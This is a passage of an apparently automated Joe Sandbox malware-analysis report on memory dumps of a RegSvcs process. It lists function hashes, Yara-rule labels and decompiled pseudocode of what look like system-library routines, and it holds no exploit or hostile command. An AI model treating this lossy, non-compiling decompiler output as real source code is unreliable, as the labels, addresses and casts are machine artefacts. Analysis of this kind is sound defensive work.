                                          • Instruction Fuzzy Hash: AE912A31E04269EFEB35AB6CC844BAD7BECAB0171CF158265FA10AB2D5D7749D04C781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004046E7 Relevance: 1.7, Strings: 1, Instructions: 435COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: Y-@
                                          • API String ID: 0-3403339602
                                          • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                          • Instruction ID: 89986a9d57c6b0f5728fcf2dbd35b5a4f8eccc7a5ab9c278f88b965ec9f59df4
                                          • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                          • Instruction Fuzzy Hash: 97026E73E547164FE720DE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040B467 Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: (
                                          • API String ID: 0-3887548279
                                          • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                          • Instruction ID: 7380bc424f57e792c3a9ed02fafcd0644f5456a42610682badc9670ba51e6dba
                                          • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                          • Instruction Fuzzy Hash: FD021CB6E006189BDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D7746A418F80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 012FB171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E012FB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x13cf7a8);
				E0134D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0134D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0133D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0133F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											E0134DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0133B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0133B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0133E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0133A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                          0x012fb171
                                          0x012fb171
                                          0x012fb171
                                          0x012fb171
                                          0x012fb171
                                          0x012fb176
                                          0x012fb17b
                                          0x012fb180
                                          0x012fb186
                                          0x012fb18f
                                          0x012fb198
                                          0x012fb1a4
                                          0x012fb1aa
                                          0x01354802
                                          0x01354802
                                          0x01354805
                                          0x0135480c
                                          0x0135480e
                                          0x012fb1d1
                                          0x012fb1d3
                                          0x012fb1de
                                          0x012fb1de
                                          0x01354817
                                          0x0135481e
                                          0x01354820
                                          0x01354822
                                          0x01354822
                                          0x01354824
                                          0x01354824
                                          0x0135482a
                                          0x00000000
                                          0x00000000
                                          0x01354835
                                          0x0135483a
                                          0x0135483d
                                          0x0135483f
                                          0x01354842
                                          0x01354842
                                          0x01354842
                                          0x01354846
                                          0x0135484c
                                          0x0135484e
                                          0x01354851
                                          0x01354851
                                          0x01354853
                                          0x01354854
                                          0x01354854
                                          0x01354858
                                          0x0135485a
                                          0x0135485a
                                          0x0135485d
                                          0x0135485f
                                          0x01354861
                                          0x01354861
                                          0x01354866
                                          0x0135486b
                                          0x0135486e
                                          0x01354871
                                          0x01354876
                                          0x01354876
                                          0x01354878
                                          0x0135487b
                                          0x01354884
                                          0x01354884
                                          0x00000000
                                          0x0135487d
                                          0x0135487d
                                          0x01354882
                                          0x01354889
                                          0x01354889
                                          0x0135488f
                                          0x01354891
                                          0x013548e0
                                          0x013548e2
                                          0x013548e4
                                          0x013548e4
                                          0x013548e7
                                          0x013548e7
                                          0x013548ed
                                          0x013548f4
                                          0x013548f6
                                          0x01354951
                                          0x01354951
                                          0x01354953
                                          0x01354953
                                          0x01354956
                                          0x01354956
                                          0x01354958
                                          0x01354959
                                          0x01354959
                                          0x0135495d
                                          0x0135495d
                                          0x0135495f
                                          0x0135495f
                                          0x01354965
                                          0x01354969
                                          0x013549ba
                                          0x013549ba
                                          0x013549c1
                                          0x013549c5
                                          0x013549cc
                                          0x013549d4
                                          0x013549d7
                                          0x013549da
                                          0x013549e4
                                          0x013549e5
                                          0x013549f3
                                          0x01354a02
                                          0x00000000
                                          0x01354a02
                                          0x01354972
                                          0x01354974
                                          0x00000000
                                          0x00000000
                                          0x01354976
                                          0x01354979
                                          0x01354982
                                          0x01354983
                                          0x01354984
                                          0x0135498b
                                          0x0135498d
                                          0x01354991
                                          0x01354993
                                          0x01354999
                                          0x0135499d
                                          0x013549a2
                                          0x013549a2
                                          0x013549a2
                                          0x01354999
                                          0x013549ac
                                          0x00000000
                                          0x013549b3
                                          0x013548f8
                                          0x013548fe
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013548fe
                                          0x01354895
                                          0x0135489c
                                          0x013548ad
                                          0x013548b2
                                          0x013548b5
                                          0x013548b7
                                          0x013548ba
                                          0x013548bc
                                          0x013548c6
                                          0x013548c6
                                          0x013548cb
                                          0x013548d1
                                          0x013548d4
                                          0x013548d8
                                          0x013548d8
                                          0x00000000
                                          0x013548d8
                                          0x013548be
                                          0x013548c0
                                          0x00000000
                                          0x00000000
                                          0x013548c2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013548c4
                                          0x00000000
                                          0x01354882
                                          0x0135487b
                                          0x01354904
                                          0x01354906
                                          0x00000000
                                          0x00000000
                                          0x01354908
                                          0x0135490e
                                          0x00000000
                                          0x00000000
                                          0x01354910
                                          0x01354917
                                          0x01354917
                                          0x00000000
                                          0x01354917
                                          0x012fb1ba
                                          0x013547f9
                                          0x013547fc
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013547fc
                                          0x012fb1c0
                                          0x012fb1c0
                                          0x012fb1c3
                                          0x012fb1cb
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: _vswprintf_s
                                          • String ID:
                                          • API String ID: 677850445-0
                                          • Opcode ID: 056956bc26111853fbee439101928de5d94dd5f39978f34436066e501218c618
                                          • Instruction ID: a3856b5299d6d900f0479356b204555e82aab24eca5b0b890cefe28ca1379619
                                          • Opcode Fuzzy Hash: 056956bc26111853fbee439101928de5d94dd5f39978f34436066e501218c618
                                          • Instruction Fuzzy Hash: 4351E471D102598FEB79CF68C845BAEBFB0BF04B18F1041ADDD599B282E7714981CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0131B944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 76%
                                          			E0131B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x13ed360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01317D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E013C8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01339E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0133B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0133CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01317D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E013C8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0133AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x13e8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x13e862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x13e8628; // 0x0
							_t116 =  *0x13e862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                          0x0131b94c
                                          0x0131b956
                                          0x0131b95c
                                          0x0131b95e
                                          0x0131b964
                                          0x0131b969
                                          0x0131b96d
                                          0x0131b96d
                                          0x0131b970
                                          0x0131b974
                                          0x0131b97a
                                          0x0131badf
                                          0x0131badf
                                          0x0131bae2
                                          0x0131bae4
                                          0x0131bae6
                                          0x0131baf0
                                          0x01362cb8
                                          0x0131baf6
                                          0x0131baf6
                                          0x0131baf6
                                          0x0131bafd
                                          0x0131bb1f
                                          0x0131bb1f
                                          0x0131baff
                                          0x0131bb00
                                          0x0131bb00
                                          0x0131bb03
                                          0x0131bb03
                                          0x0131bacb
                                          0x0131bacf
                                          0x0131bad0
                                          0x0131bad1
                                          0x0131badc
                                          0x0131badc
                                          0x0131b980
                                          0x0131b980
                                          0x0131b988
                                          0x0131b98b
                                          0x0131b98d
                                          0x0131b990
                                          0x0131b993
                                          0x0131b999
                                          0x0131b99b
                                          0x0131b9a1
                                          0x0131b9a5
                                          0x0131b9aa
                                          0x0131b9b0
                                          0x0131b9bb
                                          0x0131b9c0
                                          0x0131b9c3
                                          0x0131b9ca
                                          0x0131b9cc
                                          0x0131b9cf
                                          0x0131b9d3
                                          0x0131b9d7
                                          0x0131ba94
                                          0x0131ba94
                                          0x0131ba98
                                          0x0131baa3
                                          0x01362ccb
                                          0x0131baa9
                                          0x0131baa9
                                          0x0131baa9
                                          0x0131bab1
                                          0x01362cd5
                                          0x01362cdd
                                          0x01362cdd
                                          0x0131babb
                                          0x0131babc
                                          0x0131bac2
                                          0x0131bac3
                                          0x0131bac3
                                          0x0131bac6
                                          0x00000000
                                          0x0131b9dd
                                          0x0131b9dd
                                          0x0131b9e7
                                          0x0131b9e7
                                          0x0131b9ec
                                          0x0131b9ec
                                          0x0131b9f1
                                          0x0131b9f5
                                          0x0131b9fa
                                          0x0131ba00
                                          0x0131ba0c
                                          0x0131ba10
                                          0x0131ba10
                                          0x0131ba12
                                          0x0131ba18
                                          0x00000000
                                          0x00000000
                                          0x0131bb26
                                          0x0131bb26
                                          0x0131ba1e
                                          0x0131ba1e
                                          0x0131ba23
                                          0x0131ba25
                                          0x0131ba2c
                                          0x0131ba30
                                          0x0131ba35
                                          0x0131ba35
                                          0x0131ba41
                                          0x0131ba46
                                          0x0131ba4c
                                          0x0131ba50
                                          0x0131ba54
                                          0x0131ba6a
                                          0x0131ba6e
                                          0x0131ba70
                                          0x0131ba74
                                          0x0131ba78
                                          0x0131ba7a
                                          0x0131ba7c
                                          0x0131ba8e
                                          0x0131ba90
                                          0x0131ba92
                                          0x0131bb14
                                          0x0131bb14
                                          0x0131bb16
                                          0x0131bb16
                                          0x00000000
                                          0x0131ba7c
                                          0x0131bb0a
                                          0x0131bb0d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0131bb0f

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0131B9A5
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID:
                                          • API String ID: 885266447-0
                                          • Opcode ID: c6552bd6f5d685ed406ad78838cd1f87fc94fcfb2ed514d01ad951b7325cc36c
                                          • Instruction ID: 410802be5449b35399018b9ddcb34cd16a2c4b7539c73761eeeed3ae22e56376
                                          • Opcode Fuzzy Hash: c6552bd6f5d685ed406ad78838cd1f87fc94fcfb2ed514d01ad951b7325cc36c
                                          • Instruction Fuzzy Hash: 6C515771A08345CFD728DF2CC08092AFBF9FB88618F14896EE68597759D730E844CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013BD466 Relevance: 1.6, APIs: 1, Instructions: 123timeCOMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E013BD466(signed int __ecx, unsigned int __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v9;
				intOrPtr _v16;
				short _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t53;
				signed int _t67;
				signed char _t75;
				short _t84;
				signed int _t87;
				short* _t89;
				unsigned int _t90;
				signed int _t95;
				void* _t98;
				signed int _t99;

				_v8 =  *0x13ed360 ^ _t99;
				_t90 = __edx;
				_v36 = __ecx;
				_v20 = 0;
				_v40 = __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x13e6114 & 0x0000ffff;
				_v28 = 0;
				_t87 = E013BDDF9(__edx, _a4, __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x13e6114 & 0x0000ffff,  &_v24,  &_v28, __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x13e6114 & 0x0000ffff,  &_v9);
				_v32 = _t87;
				if(_t87 != 0xffffffff) {
					_t75 =  *(__edx + 0x1c) & 0x000000ff;
					_v20 = 1;
					_v16 = 1;
					 *0x13eb1e0( *__ecx, (_t87 << _t75) + __edx, _v24 << _t75);
					_t53 =  *( *(__ecx + 0xc) ^  *0x13e6110 ^ __ecx)();
					_t69 = _t53;
					if(_t53 < 0) {
						_t88 = _v16;
					} else {
						_t69 = 0;
						_t98 = 0;
						_t89 = ( *(__edx + 0x1e) & 0x0000ffff) + __edx + _v32 * 2;
						asm("sbb eax, eax");
						_t67 =  !(_v24 + _v24 + _t89) & _v24 + _v24 >> 0x00000001;
						if(_t67 > 0) {
							_t84 = _v20;
							do {
								if( *_t89 == _t69) {
									 *_t89 = _t84;
								}
								_t89 = _t89 + 2;
								_t98 = _t98 + 1;
							} while (_t98 < _t67);
						}
						goto L2;
						L18:
					}
				} else {
					_t69 = 0;
					L2:
					_t88 = _t69;
				}
				_t95 = _v28;
				if(_t95 != 0) {
					_t95 =  ~(_t95 <<  *(_t90 + 0x1c) >> 0xc);
					asm("lock xadd [eax], esi");
				}
				if(_t88 != 0) {
					_t88 = _a4;
					E013BD864(_t90, _a4, _v40, 2, 0);
				}
				if(_v20 != 0) {
					E0130FFB0(_t69, _t90, _t90 + 0xc);
				}
				return E0133B640(_t69, _t69, _v8 ^ _t99, _t88, _t90, _t95);
				goto L18;
			}

























                                          0x013bd475
                                          0x013bd47b
                                          0x013bd492
                                          0x013bd49e
                                          0x013bd4a4
                                          0x013bd4ac
                                          0x013bd4bc
                                          0x013bd4be
                                          0x013bd4c4
                                          0x013bd4cc
                                          0x013bd4dc
                                          0x013bd4e1
                                          0x013bd4f5
                                          0x013bd4fb
                                          0x013bd4fd
                                          0x013bd501
                                          0x013bd53d
                                          0x013bd503
                                          0x013bd507
                                          0x013bd50e
                                          0x013bd510
                                          0x013bd520
                                          0x013bd524
                                          0x013bd526
                                          0x013bd528
                                          0x013bd52b
                                          0x013bd52e
                                          0x013bd530
                                          0x013bd530
                                          0x013bd533
                                          0x013bd536
                                          0x013bd537
                                          0x013bd53b
                                          0x00000000
                                          0x00000000
                                          0x013bd526
                                          0x013bd4c6
                                          0x013bd4c6
                                          0x013bd4c8
                                          0x013bd4c8
                                          0x013bd4c8
                                          0x013bd540
                                          0x013bd545
                                          0x013bd555
                                          0x013bd55a
                                          0x013bd55a
                                          0x013bd560
                                          0x013bd562
                                          0x013bd56e
                                          0x013bd56e
                                          0x013bd577
                                          0x013bd57d
                                          0x013bd57d
                                          0x013bd594
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 73d0303b56c4a82cc0ed7a5d7fd0abd724f9e4b93a384a4ee35185f45d206f0d
                                          • Instruction ID: 2ca753bf154ee81674e42c2bbb0947f52d51a89b6a5bd4b04158d3a92d6c0f12
                                          • Opcode Fuzzy Hash: 73d0303b56c4a82cc0ed7a5d7fd0abd724f9e4b93a384a4ee35185f45d206f0d
                                          • Instruction Fuzzy Hash: 1B419271A001299BCB14CF9DC881ABEB7F9FF88218B15412AE915EB644E730DD05CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013A3D40 Relevance: 1.6, APIs: 1, Instructions: 98timeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E013A3D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x13ed360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E01312280(_t34, 0x13e8a6c);
				_t64 =  *0x13e5768; // 0x77e45768
				if(_t64 != 0x13e5768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77e45770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E0130FFB0(_t53, _t64, 0x13e8a6c);
						 *0x13eb1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E01312280(_t45, 0x13e8a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
